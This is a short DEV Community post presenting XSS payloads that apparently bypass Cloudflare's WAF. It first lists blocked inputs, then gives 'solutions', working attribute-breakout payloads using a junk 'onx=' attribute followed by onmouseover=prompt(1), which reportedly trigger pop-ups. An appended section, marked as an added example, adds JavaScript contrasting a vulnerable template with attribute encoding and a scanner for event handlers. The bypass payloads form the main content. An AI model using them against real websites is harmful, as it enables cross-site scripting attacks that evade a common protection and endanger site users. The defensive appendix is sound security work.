DEV Community

Hafiz Muhammad Attaullah
XSS BYPASS HARD CLOUDFLARE WAF SOLUTION

Problems

Input: "//ONX=""//ONFOCUS=prompt()>
Response: blocked

Input: "%01onfocus=test>
Response: blocked

Input: "%2501onfocus=>
Response: blocked

Input: "test=[1].map(confirm)>
Response: blocked

Input: "test=[1].map%26%2300000000000040;1)>
Response: blocked

...

Solutions:

Input: "onx=() onmouseover=prompt(1)>
Response: pop-up appears

Input: " onxXxxXXxXXXxx=() autofocus onmouseover=prompt(1)>
Response: pop-up appears

Input: "onx={} onmouseover=prompt(1)>
Response: pop-up appears

Input: "onx=[] onmouseover=prompt(1)>
Response: pop-up appears

Etc.
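What the two lists have in common, as an added example (not the author's code): every working payload only needs the reflected value to land unencoded inside a quoted attribute, so the leading `"` closes the attribute and a junk `onx=...` attribute sits between the quote and the real handler. The block below renders the page's own payloads through a vulnerable template and a hardened one, then scans the attributes a browser would actually see; the templates and the attribute scanner are assumptions for illustration, not anything from Cloudflare or the post.

```javascript
// Added example, not code from the original post. The bypass payloads are the
// ones listed under "Solutions"; the templates and scanner are constructed here.
const BYPASS_PAYLOADS = [
  '"onx=() onmouseover=prompt(1)>',
  '" onxXxxXXxXXXxx=() autofocus onmouseover=prompt(1)>',
  '"onx={} onmouseover=prompt(1)>',
  '"onx=[] onmouseover=prompt(1)>',
];

// Vulnerable template (assumed): reflects the value verbatim into value="...".
function renderUnsafe(value) {
  return `<input type="text" value="${value}">`;
}

// Hardened template: every character that can change attribute or tag
// structure becomes an entity, so the browser keeps the whole value as data.
// This holds no matter which on* names a WAF signature does or does not list.
function encodeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}
function renderSafe(value) {
  return `<input type="text" value="${encodeAttr(value)}">`;
}

// Lenient attribute scanner approximating how a browser tokenizes name=value
// pairs on the first tag: quoted or bare values, with or without whitespace
// before the next name. Returns the lower-cased attribute names it finds and
// stops at the first `>` outside a quoted value.
function attributeNames(html) {
  const body = html.replace(/^<[a-z][\w-]*/i, '');
  const re = /([a-z][\w-]*)\s*(?:=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?|(>)/gi;
  const names = [];
  let m;
  while ((m = re.exec(body)) !== null) {
    if (m[2]) break; // end of the tag
    names.push(m[1].toLowerCase());
  }
  return names;
}

// True if any attribute the browser would see is an event handler (on*),
// regardless of case or of the junk name used to absorb a signature match.
function hasEventHandler(html) {
  return attributeNames(html).some((n) => n.startsWith('on'));
}
```

Run against the page's payloads, `renderUnsafe` yields a tag carrying `onmouseover` every time, while `renderSafe` yields exactly two attributes, `type` and `value`, with the payload stored as inert text.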
